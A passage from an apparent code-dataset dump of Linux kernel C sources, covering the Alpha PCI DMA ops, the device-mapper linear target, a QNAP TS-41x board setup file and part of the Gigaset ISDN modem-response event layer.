static int alpha_pci_set_mask(struct device *dev, u64 mask)
{
if (!dev->dma_mask ||
!pci_dma_supported(alpha_gendev_to_pci(dev), mask))
return -EIO;
*dev->dma_mask = mask;
return 0;
}
struct dma_map_ops alpha_pci_ops = {
.alloc = alpha_pci_alloc_coherent,
.free = alpha_pci_free_coherent,
.map_page = alpha_pci_map_page,
.unmap_page = alpha_pci_unmap_page,
.map_sg = alpha_pci_map_sg,
.unmap_sg = alpha_pci_unmap_sg,
.mapping_error = alpha_pci_mapping_error,
.dma_supported = alpha_pci_supported,
.set_dma_mask = alpha_pci_set_mask,
};
struct dma_map_ops *dma_ops = &alpha_pci_ops;
EXPORT_SYMBOL(dma_ops);
| gpl-2.0 |
profglavcho/mt6735-kernel-3.10.61 | drivers/md/dm-linear.c | 2306 | 3895 | /*
* Copyright (C) 2001-2003 Sistina Software (UK) Limited.
*
* This file is released under the GPL.
*/
#include "dm.h"
#include <linux/module.h>
#include <linux/init.h>
#include <linux/blkdev.h>
#include <linux/bio.h>
#include <linux/slab.h>
#include <linux/device-mapper.h>
#define DM_MSG_PREFIX "linear"
/*
* Linear: maps a linear range of a device.
*/
struct linear_c {
struct dm_dev *dev;
sector_t start;
};
/*
* Construct a linear mapping: <dev_path> <offset>
*/
static int linear_ctr(struct dm_target *ti, unsigned int argc, char **argv)
{
struct linear_c *lc;
unsigned long long tmp;
char dummy;
if (argc != 2) {
ti->error = "Invalid argument count";
return -EINVAL;
}
lc = kmalloc(sizeof(*lc), GFP_KERNEL);
if (lc == NULL) {
ti->error = "dm-linear: Cannot allocate linear context";
return -ENOMEM;
}
if (sscanf(argv[1], "%llu%c", &tmp, &dummy) != 1) {
ti->error = "dm-linear: Invalid device sector";
goto bad;
}
lc->start = tmp;
if (dm_get_device(ti, argv[0], dm_table_get_mode(ti->table), &lc->dev)) {
ti->error = "dm-linear: Device lookup failed";
goto bad;
}
ti->num_flush_bios = 1;
ti->num_discard_bios = 1;
ti->num_write_same_bios = 1;
ti->private = lc;
return 0;
bad:
kfree(lc);
return -EINVAL;
}
static void linear_dtr(struct dm_target *ti)
{
struct linear_c *lc = (struct linear_c *) ti->private;
dm_put_device(ti, lc->dev);
kfree(lc);
}
static sector_t linear_map_sector(struct dm_target *ti, sector_t bi_sector)
{
struct linear_c *lc = ti->private;
return lc->start + dm_target_offset(ti, bi_sector);
}
static void linear_map_bio(struct dm_target *ti, struct bio *bio)
{
struct linear_c *lc = ti->private;
bio->bi_bdev = lc->dev->bdev;
if (bio_sectors(bio))
bio->bi_sector = linear_map_sector(ti, bio->bi_sector);
}
static int linear_map(struct dm_target *ti, struct bio *bio)
{
linear_map_bio(ti, bio);
return DM_MAPIO_REMAPPED;
}
static void linear_status(struct dm_target *ti, status_type_t type,
unsigned status_flags, char *result, unsigned maxlen)
{
struct linear_c *lc = (struct linear_c *) ti->private;
switch (type) {
case STATUSTYPE_INFO:
result[0] = '\0';
break;
case STATUSTYPE_TABLE:
snprintf(result, maxlen, "%s %llu", lc->dev->name,
(unsigned long long)lc->start);
break;
}
}
static int linear_ioctl(struct dm_target *ti, unsigned int cmd,
unsigned long arg)
{
struct linear_c *lc = (struct linear_c *) ti->private;
struct dm_dev *dev = lc->dev;
int r = 0;
/*
* Only pass ioctls through if the device sizes match exactly.
*/
if (lc->start ||
ti->len != i_size_read(dev->bdev->bd_inode) >> SECTOR_SHIFT)
r = scsi_verify_blk_ioctl(NULL, cmd);
return r ? : __blkdev_driver_ioctl(dev->bdev, dev->mode, cmd, arg);
}
static int linear_merge(struct dm_target *ti, struct bvec_merge_data *bvm,
struct bio_vec *biovec, int max_size)
{
struct linear_c *lc = ti->private;
struct request_queue *q = bdev_get_queue(lc->dev->bdev);
if (!q->merge_bvec_fn)
return max_size;
bvm->bi_bdev = lc->dev->bdev;
bvm->bi_sector = linear_map_sector(ti, bvm->bi_sector);
return min(max_size, q->merge_bvec_fn(q, bvm, biovec));
}
static int linear_iterate_devices(struct dm_target *ti,
iterate_devices_callout_fn fn, void *data)
{
struct linear_c *lc = ti->private;
return fn(ti, lc->dev, lc->start, ti->len, data);
}
static struct target_type linear_target = {
.name = "linear",
.version = {1, 2, 1},
.module = THIS_MODULE,
.ctr = linear_ctr,
.dtr = linear_dtr,
.map = linear_map,
.status = linear_status,
.ioctl = linear_ioctl,
.merge = linear_merge,
.iterate_devices = linear_iterate_devices,
};
int __init dm_linear_init(void)
{
int r = dm_register_target(&linear_target);
if (r < 0)
DMERR("register failed %d", r);
return r;
}
void dm_linear_exit(void)
{
dm_unregister_target(&linear_target);
}
| gpl-2.0 |
RockchipOpensourceCommunity/px2-android-kernel-3.0 | arch/arm/mach-kirkwood/ts41x-setup.c | 2818 | 4577 | /*
*
* QNAP TS-410, TS-410U, TS-419P and TS-419U Turbo NAS Board Setup
*
* Copyright (C) 2009-2010 Martin Michlmayr <tbm@cyrius.com>
* Copyright (C) 2008 Byron Bradley <byron.bbradley@gmail.com>
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version
* 2 of the License, or (at your option) any later version.
*/
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/platform_device.h>
#include <linux/i2c.h>
#include <linux/mv643xx_eth.h>
#include <linux/ata_platform.h>
#include <linux/gpio.h>
#include <linux/gpio_keys.h>
#include <linux/input.h>
#include <asm/mach-types.h>
#include <asm/mach/arch.h>
#include <mach/kirkwood.h>
#include "common.h"
#include "mpp.h"
#include "tsx1x-common.h"
/* for the PCIe reset workaround */
#include <plat/pcie.h>
#define QNAP_TS41X_JUMPER_JP1 45
static struct i2c_board_info __initdata qnap_ts41x_i2c_rtc = {
I2C_BOARD_INFO("s35390a", 0x30),
};
static struct mv643xx_eth_platform_data qnap_ts41x_ge00_data = {
.phy_addr = MV643XX_ETH_PHY_ADDR(8),
};
static struct mv643xx_eth_platform_data qnap_ts41x_ge01_data = {
.phy_addr = MV643XX_ETH_PHY_ADDR(0),
};
static struct mv_sata_platform_data qnap_ts41x_sata_data = {
.n_ports = 2,
};
static struct gpio_keys_button qnap_ts41x_buttons[] = {
{
.code = KEY_COPY,
.gpio = 43,
.desc = "USB Copy",
.active_low = 1,
},
{
.code = KEY_RESTART,
.gpio = 37,
.desc = "Reset",
.active_low = 1,
},
};
static struct gpio_keys_platform_data qnap_ts41x_button_data = {
.buttons = qnap_ts41x_buttons,
.nbuttons = ARRAY_SIZE(qnap_ts41x_buttons),
};
static struct platform_device qnap_ts41x_button_device = {
.name = "gpio-keys",
.id = -1,
.num_resources = 0,
.dev = {
.platform_data = &qnap_ts41x_button_data,
}
};
static unsigned int qnap_ts41x_mpp_config[] __initdata = {
MPP0_SPI_SCn,
MPP1_SPI_MOSI,
MPP2_SPI_SCK,
MPP3_SPI_MISO,
MPP6_SYSRST_OUTn,
MPP7_PEX_RST_OUTn,
MPP8_TW0_SDA,
MPP9_TW0_SCK,
MPP10_UART0_TXD,
MPP11_UART0_RXD,
MPP13_UART1_TXD, /* PIC controller */
MPP14_UART1_RXD, /* PIC controller */
MPP15_SATA0_ACTn,
MPP16_SATA1_ACTn,
MPP20_GE1_TXD0,
MPP21_GE1_TXD1,
MPP22_GE1_TXD2,
MPP23_GE1_TXD3,
MPP24_GE1_RXD0,
MPP25_GE1_RXD1,
MPP26_GE1_RXD2,
MPP27_GE1_RXD3,
MPP30_GE1_RXCTL,
MPP31_GE1_RXCLK,
MPP32_GE1_TCLKOUT,
MPP33_GE1_TXCTL,
MPP36_GPIO, /* RAM: 0: 256 MB, 1: 512 MB */
MPP37_GPIO, /* Reset button */
MPP43_GPIO, /* USB Copy button */
MPP44_GPIO, /* Board ID: 0: TS-419U, 1: TS-419 */
MPP45_GPIO, /* JP1: 0: LCD, 1: serial console */
MPP46_GPIO, /* External SATA HDD1 error indicator */
MPP47_GPIO, /* External SATA HDD2 error indicator */
MPP48_GPIO, /* External SATA HDD3 error indicator */
MPP49_GPIO, /* External SATA HDD4 error indicator */
0
};
static void __init qnap_ts41x_init(void)
{
u32 dev, rev;
/*
* Basic setup. Needs to be called early.
*/
kirkwood_init();
kirkwood_mpp_conf(qnap_ts41x_mpp_config);
kirkwood_uart0_init();
kirkwood_uart1_init(); /* A PIC controller is connected here. */
qnap_tsx1x_register_flash();
kirkwood_i2c_init();
i2c_register_board_info(0, &qnap_ts41x_i2c_rtc, 1);
kirkwood_pcie_id(&dev, &rev);
if (dev == MV88F6282_DEV_ID) {
qnap_ts41x_ge00_data.phy_addr = MV643XX_ETH_PHY_ADDR(0);
qnap_ts41x_ge01_data.phy_addr = MV643XX_ETH_PHY_ADDR(1);
}
kirkwood_ge00_init(&qnap_ts41x_ge00_data);
kirkwood_ge01_init(&qnap_ts41x_ge01_data);
kirkwood_sata_init(&qnap_ts41x_sata_data);
kirkwood_ehci_init();
platform_device_register(&qnap_ts41x_button_device);
pm_power_off = qnap_tsx1x_power_off;
if (gpio_request(QNAP_TS41X_JUMPER_JP1, "JP1") == 0)
gpio_export(QNAP_TS41X_JUMPER_JP1, 0);
}
static int __init ts41x_pci_init(void)
{
if (machine_is_ts41x()) {
u32 dev, rev;
/*
* Without this explicit reset, the PCIe SATA controller
* (Marvell 88sx7042/sata_mv) is known to stop working
* after a few minutes.
*/
orion_pcie_reset((void __iomem *)PCIE_VIRT_BASE);
kirkwood_pcie_id(&dev, &rev);
if (dev == MV88F6282_DEV_ID)
kirkwood_pcie_init(KW_PCIE1 | KW_PCIE0);
else
kirkwood_pcie_init(KW_PCIE0);
}
return 0;
}
subsys_initcall(ts41x_pci_init);
MACHINE_START(TS41X, "QNAP TS-41x")
/* Maintainer: Martin Michlmayr <tbm@cyrius.com> */
.boot_params = 0x00000100,
.init_machine = qnap_ts41x_init,
.map_io = kirkwood_map_io,
.init_early = kirkwood_init_early,
.init_irq = kirkwood_init_irq,
.timer = &kirkwood_timer,
MACHINE_END
| gpl-2.0 |
coliby/terasic_MTL | drivers/isdn/gigaset/ev-layer.c | 2818 | 48217 | /*
* Stuff used by all variants of the driver
*
* Copyright (c) 2001 by Stefan Eilers,
* Hansjoerg Lipp <hjlipp@web.de>,
* Tilman Schmidt <tilman@imap.cc>.
*
* =====================================================================
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License as
* published by the Free Software Foundation; either version 2 of
* the License, or (at your option) any later version.
* =====================================================================
*/
#include <linux/export.h>
#include "gigaset.h"
/* ========================================================== */
/* bit masks for pending commands */
#define PC_DIAL 0x001
#define PC_HUP 0x002
#define PC_INIT 0x004
#define PC_DLE0 0x008
#define PC_DLE1 0x010
#define PC_SHUTDOWN 0x020
#define PC_ACCEPT 0x040
#define PC_CID 0x080
#define PC_NOCID 0x100
#define PC_CIDMODE 0x200
#define PC_UMMODE 0x400
/* types of modem responses */
#define RT_NOTHING 0
#define RT_ZSAU 1
#define RT_RING 2
#define RT_NUMBER 3
#define RT_STRING 4
#define RT_ZCAU 6
/* Possible ASCII responses */
#define RSP_OK 0
#define RSP_ERROR 1
#define RSP_ZGCI 3
#define RSP_RING 4
#define RSP_ZVLS 5
#define RSP_ZCAU 6
/* responses with values to store in at_state */
/* - numeric */
#define RSP_VAR 100
#define RSP_ZSAU (RSP_VAR + VAR_ZSAU)
#define RSP_ZDLE (RSP_VAR + VAR_ZDLE)
#define RSP_ZCTP (RSP_VAR + VAR_ZCTP)
/* - string */
#define RSP_STR (RSP_VAR + VAR_NUM)
#define RSP_NMBR (RSP_STR + STR_NMBR)
#define RSP_ZCPN (RSP_STR + STR_ZCPN)
#define RSP_ZCON (RSP_STR + STR_ZCON)
#define RSP_ZBC (RSP_STR + STR_ZBC)
#define RSP_ZHLC (RSP_STR + STR_ZHLC)
#define RSP_WRONG_CID -2 /* unknown cid in cmd */
#define RSP_INVAL -6 /* invalid response */
#define RSP_NODEV -9 /* device not connected */
#define RSP_NONE -19
#define RSP_STRING -20
#define RSP_NULL -21
#define RSP_INIT -27
#define RSP_ANY -26
#define RSP_LAST -28
/* actions for process_response */
#define ACT_NOTHING 0
#define ACT_SETDLE1 1
#define ACT_SETDLE0 2
#define ACT_FAILINIT 3
#define ACT_HUPMODEM 4
#define ACT_CONFIGMODE 5
#define ACT_INIT 6
#define ACT_DLE0 7
#define ACT_DLE1 8
#define ACT_FAILDLE0 9
#define ACT_FAILDLE1 10
#define ACT_RING 11
#define ACT_CID 12
#define ACT_FAILCID 13
#define ACT_SDOWN 14
#define ACT_FAILSDOWN 15
#define ACT_DEBUG 16
#define ACT_WARN 17
#define ACT_DIALING 18
#define ACT_ABORTDIAL 19
#define ACT_DISCONNECT 20
#define ACT_CONNECT 21
#define ACT_REMOTEREJECT 22
#define ACT_CONNTIMEOUT 23
#define ACT_REMOTEHUP 24
#define ACT_ABORTHUP 25
#define ACT_ICALL 26
#define ACT_ACCEPTED 27
#define ACT_ABORTACCEPT 28
#define ACT_TIMEOUT 29
#define ACT_GETSTRING 30
#define ACT_SETVER 31
#define ACT_FAILVER 32
#define ACT_GOTVER 33
#define ACT_TEST 34
#define ACT_ERROR 35
#define ACT_ABORTCID 36
#define ACT_ZCAU 37
#define ACT_NOTIFY_BC_DOWN 38
#define ACT_NOTIFY_BC_UP 39
#define ACT_DIAL 40
#define ACT_ACCEPT 41
#define ACT_HUP 43
#define ACT_IF_LOCK 44
#define ACT_START 45
#define ACT_STOP 46
#define ACT_FAKEDLE0 47
#define ACT_FAKEHUP 48
#define ACT_FAKESDOWN 49
#define ACT_SHUTDOWN 50
#define ACT_PROC_CIDMODE 51
#define ACT_UMODESET 52
#define ACT_FAILUMODE 53
#define ACT_CMODESET 54
#define ACT_FAILCMODE 55
#define ACT_IF_VER 56
#define ACT_CMD 100
/* at command sequences */
#define SEQ_NONE 0
#define SEQ_INIT 100
#define SEQ_DLE0 200
#define SEQ_DLE1 250
#define SEQ_CID 300
#define SEQ_NOCID 350
#define SEQ_HUP 400
#define SEQ_DIAL 600
#define SEQ_ACCEPT 720
#define SEQ_SHUTDOWN 500
#define SEQ_CIDMODE 10
#define SEQ_UMMODE 11
/* 100: init, 200: dle0, 250:dle1, 300: get cid (dial), 350: "hup" (no cid),
* 400: hup, 500: reset, 600: dial, 700: ring */
struct reply_t gigaset_tab_nocid[] =
{
/* resp_code, min_ConState, max_ConState, parameter, new_ConState, timeout,
* action, command */
/* initialize device, set cid mode if possible */
{RSP_INIT, -1, -1, SEQ_INIT, 100, 1, {ACT_TIMEOUT} },
{EV_TIMEOUT, 100, 100, -1, 101, 3, {0}, "Z\r"},
{RSP_OK, 101, 103, -1, 120, 5, {ACT_GETSTRING},
"+GMR\r"},
{EV_TIMEOUT, 101, 101, -1, 102, 5, {0}, "Z\r"},
{RSP_ERROR, 101, 101, -1, 102, 5, {0}, "Z\r"},
{EV_TIMEOUT, 102, 102, -1, 108, 5, {ACT_SETDLE1},
"^SDLE=0\r"},
{RSP_OK, 108, 108, -1, 104, -1},
{RSP_ZDLE, 104, 104, 0, 103, 5, {0}, "Z\r"},
{EV_TIMEOUT, 104, 104, -1, 0, 0, {ACT_FAILINIT} },
{RSP_ERROR, 108, 108, -1, 0, 0, {ACT_FAILINIT} },
{EV_TIMEOUT, 108, 108, -1, 105, 2, {ACT_SETDLE0,
ACT_HUPMODEM,
ACT_TIMEOUT} },
{EV_TIMEOUT, 105, 105, -1, 103, 5, {0}, "Z\r"},
{RSP_ERROR, 102, 102, -1, 107, 5, {0}, "^GETPRE\r"},
{RSP_OK, 107, 107, -1, 0, 0, {ACT_CONFIGMODE} },
{RSP_ERROR, 107, 107, -1, 0, 0, {ACT_FAILINIT} },
{EV_TIMEOUT, 107, 107, -1, 0, 0, {ACT_FAILINIT} },
{RSP_ERROR, 103, 103, -1, 0, 0, {ACT_FAILINIT} },
{EV_TIMEOUT, 103, 103, -1, 0, 0, {ACT_FAILINIT} },
{RSP_STRING, 120, 120, -1, 121, -1, {ACT_SETVER} },
{EV_TIMEOUT, 120, 121, -1, 0, 0, {ACT_FAILVER,
ACT_INIT} },
{RSP_ERROR, 120, 121, -1, 0, 0, {ACT_FAILVER,
ACT_INIT} },
{RSP_OK, 121, 121, -1, 0, 0, {ACT_GOTVER,
ACT_INIT} },
{RSP_NONE, 121, 121, -1, 120, 0, {ACT_GETSTRING} },
/* leave dle mode */
{RSP_INIT, 0, 0, SEQ_DLE0, 201, 5, {0}, "^SDLE=0\r"},
{RSP_OK, 201, 201, -1, 202, -1},
{RSP_ZDLE, 202, 202, 0, 0, 0, {ACT_DLE0} },
{RSP_NODEV, 200, 249, -1, 0, 0, {ACT_FAKEDLE0} },
{RSP_ERROR, 200, 249, -1, 0, 0, {ACT_FAILDLE0} },
{EV_TIMEOUT, 200, 249, -1, 0, 0, {ACT_FAILDLE0} },
/* enter dle mode */
{RSP_INIT, 0, 0, SEQ_DLE1, 251, 5, {0}, "^SDLE=1\r"},
{RSP_OK, 251, 251, -1, 252, -1},
{RSP_ZDLE, 252, 252, 1, 0, 0, {ACT_DLE1} },
{RSP_ERROR, 250, 299, -1, 0, 0, {ACT_FAILDLE1} },
{EV_TIMEOUT, 250, 299, -1, 0, 0, {ACT_FAILDLE1} },
/* incoming call */
{RSP_RING, -1, -1, -1, -1, -1, {ACT_RING} },
/* get cid */
{RSP_INIT, 0, 0, SEQ_CID, 301, 5, {0}, "^SGCI?\r"},
{RSP_OK, 301, 301, -1, 302, -1},
{RSP_ZGCI, 302, 302, -1, 0, 0, {ACT_CID} },
{RSP_ERROR, 301, 349, -1, 0, 0, {ACT_FAILCID} },
{EV_TIMEOUT, 301, 349, -1, 0, 0, {ACT_FAILCID} },
/* enter cid mode */
{RSP_INIT, 0, 0, SEQ_CIDMODE, 150, 5, {0}, "^SGCI=1\r"},
{RSP_OK, 150, 150, -1, 0, 0, {ACT_CMODESET} },
{RSP_ERROR, 150, 150, -1, 0, 0, {ACT_FAILCMODE} },
{EV_TIMEOUT, 150, 150, -1, 0, 0, {ACT_FAILCMODE} },
/* leave cid mode */
{RSP_INIT, 0, 0, SEQ_UMMODE, 160, 5, {0}, "Z\r"},
{RSP_OK, 160, 160, -1, 0, 0, {ACT_UMODESET} },
{RSP_ERROR, 160, 160, -1, 0, 0, {ACT_FAILUMODE} },
{EV_TIMEOUT, 160, 160, -1, 0, 0, {ACT_FAILUMODE} },
/* abort getting cid */
{RSP_INIT, 0, 0, SEQ_NOCID, 0, 0, {ACT_ABORTCID} },
/* reset */
{RSP_INIT, 0, 0, SEQ_SHUTDOWN, 504, 5, {0}, "Z\r"},
{RSP_OK, 504, 504, -1, 0, 0, {ACT_SDOWN} },
{RSP_ERROR, 501, 599, -1, 0, 0, {ACT_FAILSDOWN} },
{EV_TIMEOUT, 501, 599, -1, 0, 0, {ACT_FAILSDOWN} },
{RSP_NODEV, 501, 599, -1, 0, 0, {ACT_FAKESDOWN} },
{EV_PROC_CIDMODE, -1, -1, -1, -1, -1, {ACT_PROC_CIDMODE} },
{EV_IF_LOCK, -1, -1, -1, -1, -1, {ACT_IF_LOCK} },
{EV_IF_VER, -1, -1, -1, -1, -1, {ACT_IF_VER} },
{EV_START, -1, -1, -1, -1, -1, {ACT_START} },
{EV_STOP, -1, -1, -1, -1, -1, {ACT_STOP} },
{EV_SHUTDOWN, -1, -1, -1, -1, -1, {ACT_SHUTDOWN} },
/* misc. */
{RSP_ERROR, -1, -1, -1, -1, -1, {ACT_ERROR} },
{RSP_ZCAU, -1, -1, -1, -1, -1, {ACT_ZCAU} },
{RSP_NONE, -1, -1, -1, -1, -1, {ACT_DEBUG} },
{RSP_ANY, -1, -1, -1, -1, -1, {ACT_WARN} },
{RSP_LAST}
};
/* 600: start dialing, 650: dial in progress, 800: connection is up, 700: ring,
* 400: hup, 750: accepted icall */
struct reply_t gigaset_tab_cid[] =
{
/* resp_code, min_ConState, max_ConState, parameter, new_ConState, timeout,
* action, command */
/* dial */
{EV_DIAL, -1, -1, -1, -1, -1, {ACT_DIAL} },
{RSP_INIT, 0, 0, SEQ_DIAL, 601, 5, {ACT_CMD + AT_BC} },
{RSP_OK, 601, 601, -1, 603, 5, {ACT_CMD + AT_PROTO} },
{RSP_OK, 603, 603, -1, 604, 5, {ACT_CMD + AT_TYPE} },
{RSP_OK, 604, 604, -1, 605, 5, {ACT_CMD + AT_MSN} },
{RSP_NULL, 605, 605, -1, 606, 5, {ACT_CMD + AT_CLIP} },
{RSP_OK, 605, 605, -1, 606, 5, {ACT_CMD + AT_CLIP} },
{RSP_NULL, 606, 606, -1, 607, 5, {ACT_CMD + AT_ISO} },
{RSP_OK, 606, 606, -1, 607, 5, {ACT_CMD + AT_ISO} },
{RSP_OK, 607, 607, -1, 608, 5, {0}, "+VLS=17\r"},
{RSP_OK, 608, 608, -1, 609, -1},
{RSP_ZSAU, 609, 609, ZSAU_PROCEEDING, 610, 5, {ACT_CMD + AT_DIAL} },
{RSP_OK, 610, 610, -1, 650, 0, {ACT_DIALING} },
{RSP_ERROR, 601, 610, -1, 0, 0, {ACT_ABORTDIAL} },
{EV_TIMEOUT, 601, 610, -1, 0, 0, {ACT_ABORTDIAL} },
/* optional dialing responses */
{EV_BC_OPEN, 650, 650, -1, 651, -1},
{RSP_ZVLS, 609, 651, 17, -1, -1, {ACT_DEBUG} },
{RSP_ZCTP, 610, 651, -1, -1, -1, {ACT_DEBUG} },
{RSP_ZCPN, 610, 651, -1, -1, -1, {ACT_DEBUG} },
{RSP_ZSAU, 650, 651, ZSAU_CALL_DELIVERED, -1, -1, {ACT_DEBUG} },
/* connect */
{RSP_ZSAU, 650, 650, ZSAU_ACTIVE, 800, -1, {ACT_CONNECT} },
{RSP_ZSAU, 651, 651, ZSAU_ACTIVE, 800, -1, {ACT_CONNECT,
ACT_NOTIFY_BC_UP} },
{RSP_ZSAU, 750, 750, ZSAU_ACTIVE, 800, -1, {ACT_CONNECT} },
{RSP_ZSAU, 751, 751, ZSAU_ACTIVE, 800, -1, {ACT_CONNECT,
ACT_NOTIFY_BC_UP} },
{EV_BC_OPEN, 800, 800, -1, 800, -1, {ACT_NOTIFY_BC_UP} },
/* remote hangup */
{RSP_ZSAU, 650, 651, ZSAU_DISCONNECT_IND, 0, 0, {ACT_REMOTEREJECT} },
{RSP_ZSAU, 750, 751, ZSAU_DISCONNECT_IND, 0, 0, {ACT_REMOTEHUP} },
{RSP_ZSAU, 800, 800, ZSAU_DISCONNECT_IND, 0, 0, {ACT_REMOTEHUP} },
/* hangup */
{EV_HUP, -1, -1, -1, -1, -1, {ACT_HUP} },
{RSP_INIT, -1, -1, SEQ_HUP, 401, 5, {0}, "+VLS=0\r"},
{RSP_OK, 401, 401, -1, 402, 5},
{RSP_ZVLS, 402, 402, 0, 403, 5},
{RSP_ZSAU, 403, 403, ZSAU_DISCONNECT_REQ, -1, -1, {ACT_DEBUG} },
{RSP_ZSAU, 403, 403, ZSAU_NULL, 0, 0, {ACT_DISCONNECT} },
{RSP_NODEV, 401, 403, -1, 0, 0, {ACT_FAKEHUP} },
{RSP_ERROR, 401, 401, -1, 0, 0, {ACT_ABORTHUP} },
{EV_TIMEOUT, 401, 403, -1, 0, 0, {ACT_ABORTHUP} },
{EV_BC_CLOSED, 0, 0, -1, 0, -1, {ACT_NOTIFY_BC_DOWN} },
/* ring */
{RSP_ZBC, 700, 700, -1, -1, -1, {0} },
{RSP_ZHLC, 700, 700, -1, -1, -1, {0} },
{RSP_NMBR, 700, 700, -1, -1, -1, {0} },
{RSP_ZCPN, 700, 700, -1, -1, -1, {0} },
{RSP_ZCTP, 700, 700, -1, -1, -1, {0} },
{EV_TIMEOUT, 700, 700, -1, 720, 720, {ACT_ICALL} },
{EV_BC_CLOSED, 720, 720, -1, 0, -1, {ACT_NOTIFY_BC_DOWN} },
/*accept icall*/
{EV_ACCEPT, -1, -1, -1, -1, -1, {ACT_ACCEPT} },
{RSP_INIT, 720, 720, SEQ_ACCEPT, 721, 5, {ACT_CMD + AT_PROTO} },
{RSP_OK, 721, 721, -1, 722, 5, {ACT_CMD + AT_ISO} },
{RSP_OK, 722, 722, -1, 723, 5, {0}, "+VLS=17\r"},
{RSP_OK, 723, 723, -1, 724, 5, {0} },
{RSP_ZVLS, 724, 724, 17, 750, 50, {ACT_ACCEPTED} },
{RSP_ERROR, 721, 729, -1, 0, 0, {ACT_ABORTACCEPT} },
{EV_TIMEOUT, 721, 729, -1, 0, 0, {ACT_ABORTACCEPT} },
{RSP_ZSAU, 700, 729, ZSAU_NULL, 0, 0, {ACT_ABORTACCEPT} },
{RSP_ZSAU, 700, 729, ZSAU_ACTIVE, 0, 0, {ACT_ABORTACCEPT} },
{RSP_ZSAU, 700, 729, ZSAU_DISCONNECT_IND, 0, 0, {ACT_ABORTACCEPT} },
{EV_BC_OPEN, 750, 750, -1, 751, -1},
{EV_TIMEOUT, 750, 751, -1, 0, 0, {ACT_CONNTIMEOUT} },
/* B channel closed (general case) */
{EV_BC_CLOSED, -1, -1, -1, -1, -1, {ACT_NOTIFY_BC_DOWN} },
/* misc. */
{RSP_ZCON, -1, -1, -1, -1, -1, {ACT_DEBUG} },
{RSP_ZCAU, -1, -1, -1, -1, -1, {ACT_ZCAU} },
{RSP_NONE, -1, -1, -1, -1, -1, {ACT_DEBUG} },
{RSP_ANY, -1, -1, -1, -1, -1, {ACT_WARN} },
{RSP_LAST}
};
static const struct resp_type_t {
char *response;
int resp_code;
int type;
}
resp_type[] =
{
{"OK", RSP_OK, RT_NOTHING},
{"ERROR", RSP_ERROR, RT_NOTHING},
{"ZSAU", RSP_ZSAU, RT_ZSAU},
{"ZCAU", RSP_ZCAU, RT_ZCAU},
{"RING", RSP_RING, RT_RING},
{"ZGCI", RSP_ZGCI, RT_NUMBER},
{"ZVLS", RSP_ZVLS, RT_NUMBER},
{"ZCTP", RSP_ZCTP, RT_NUMBER},
{"ZDLE", RSP_ZDLE, RT_NUMBER},
{"ZHLC", RSP_ZHLC, RT_STRING},
{"ZBC", RSP_ZBC, RT_STRING},
{"NMBR", RSP_NMBR, RT_STRING},
{"ZCPN", RSP_ZCPN, RT_STRING},
{"ZCON", RSP_ZCON, RT_STRING},
{NULL, 0, 0}
};
static const struct zsau_resp_t {
char *str;
int code;
}
zsau_resp[] =
{
{"OUTGOING_CALL_PROCEEDING", ZSAU_PROCEEDING},
{"CALL_DELIVERED", ZSAU_CALL_DELIVERED},
{"ACTIVE", ZSAU_ACTIVE},
{"DISCONNECT_IND", ZSAU_DISCONNECT_IND},
{"NULL", ZSAU_NULL},
{"DISCONNECT_REQ", ZSAU_DISCONNECT_REQ},
{NULL, ZSAU_UNKNOWN}
};
/* retrieve CID from parsed response
* returns 0 if no CID, -1 if invalid CID, or CID value 1..65535
*/
static int cid_of_response(char *s)
{
int cid;
int rc;
if (s[-1] != ';')
return 0; /* no CID separator */
rc = kstrtoint(s, 10, &cid);
if (rc)
return 0; /* CID not numeric */
if (cid < 1 || cid > 65535)
return -1; /* CID out of range */
return cid;
}
/**
* gigaset_handle_modem_response() - process received modem response
* @cs: device descriptor structure.
*
* Called by asyncdata/isocdata if a block of data received from the
* device must be processed as a modem command response. The data is
* already in the cs structure.
*/
void gigaset_handle_modem_response(struct cardstate *cs)
{
unsigned char *argv[MAX_REC_PARAMS + 1];
int params;
int i, j;
const struct resp_type_t *rt;
const struct zsau_resp_t *zr;
int curarg;
unsigned long flags;
unsigned next, tail, head;
struct event_t *event;
int resp_code;
int param_type;
int abort;
size_t len;
int cid;
int rawstring;
len = cs->cbytes;
if (!len) {
/* ignore additional LFs/CRs (M10x config mode or cx100) */
gig_dbg(DEBUG_MCMD, "skipped EOL [%02X]", cs->respdata[0]);
return;
}
cs->respdata[len] = 0;
argv[0] = cs->respdata;
params = 1;
if (cs->at_state.getstring) {
/* getstring only allowed without cid at the moment */
cs->at_state.getstring = 0;
rawstring = 1;
cid = 0;
} else {
/* parse line */
for (i = 0; i < len; i++)
switch (cs->respdata[i]) {
case ';':
case ',':
case '=':
if (params > MAX_REC_PARAMS) {
dev_warn(cs->dev,
"too many parameters in response\n");
/* need last parameter (might be CID) */
params--;
}
argv[params++] = cs->respdata + i + 1;
}
rawstring = 0;
cid = params > 1 ? cid_of_response(argv[params - 1]) : 0;
if (cid < 0) {
gigaset_add_event(cs, &cs->at_state, RSP_INVAL,
NULL, 0, NULL);
return;
}
for (j = 1; j < params; ++j)
argv[j][-1] = 0;
gig_dbg(DEBUG_EVENT, "CMD received: %s", argv[0]);
if (cid) {
--params;
gig_dbg(DEBUG_EVENT, "CID: %s", argv[params]);
}
gig_dbg(DEBUG_EVENT, "available params: %d", params - 1);
for (j = 1; j < params; j++)
gig_dbg(DEBUG_EVENT, "param %d: %s", j, argv[j]);
}
spin_lock_irqsave(&cs->ev_lock, flags);
head = cs->ev_head;
tail = cs->ev_tail;
abort = 1;
curarg = 0;
while (curarg < params) {
next = (tail + 1) % MAX_EVENTS;
if (unlikely(next == head)) {
dev_err(cs->dev, "event queue full\n");
break;
}
event = cs->events + tail;
event->at_state = NULL;
event->cid = cid;
event->ptr = NULL;
event->arg = NULL;
tail = next;
if (rawstring) {
resp_code = RSP_STRING;
param_type = RT_STRING;
} else {
for (rt = resp_type; rt->response; ++rt)
if (!strcmp(argv[curarg], rt->response))
break;
if (!rt->response) {
event->type = RSP_NONE;
gig_dbg(DEBUG_EVENT,
"unknown modem response: '%s'\n",
argv[curarg]);
break;
}
resp_code = rt->resp_code;
param_type = rt->type;
++curarg;
}
event->type = resp_code;
switch (param_type) {
case RT_NOTHING:
break;
case RT_RING:
if (!cid) {
dev_err(cs->dev,
"received RING without CID!\n");
event->type = RSP_INVAL;
abort = 1;
} else {
event->cid = 0;
event->parameter = cid;
abort = 0;
}
break;
case RT_ZSAU:
